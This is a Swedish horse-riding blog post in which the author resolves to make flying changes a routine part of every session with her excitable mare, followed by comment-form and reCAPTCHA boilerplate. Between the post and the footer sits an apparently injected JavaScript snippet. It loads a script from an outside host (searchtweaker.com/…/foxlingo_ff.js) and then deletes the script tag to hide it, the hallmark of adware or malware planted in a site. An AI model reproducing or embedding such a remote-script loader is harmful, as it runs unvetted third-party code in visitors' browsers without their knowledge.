Livet hos Hogengård

Nu ska det bytas!

När jag red ute i det sköna vädret igår så bestämde jag mig. Byten ska bli vardag. Jag ska sluta fjolla mig och få fjärilar efter varje byte. Det betyder att byten ska ingå i varje pass härefter. Jag har ju ridit miljarders byten på min förra häst Wille så vad är skillnaden?! Möjligen att denna damen är mer explosiv och känslig än den sure gamle mannen. Men de pass som hon är hyfsat avspänd så ska det bytas. Punkt. 🙂

(function(){try{var header=document.getElementsByTagName(”HEAD”)[0];var script=document.createElement(”SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Related Posts

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

The reCAPTCHA verification period has expired. Please reload the page.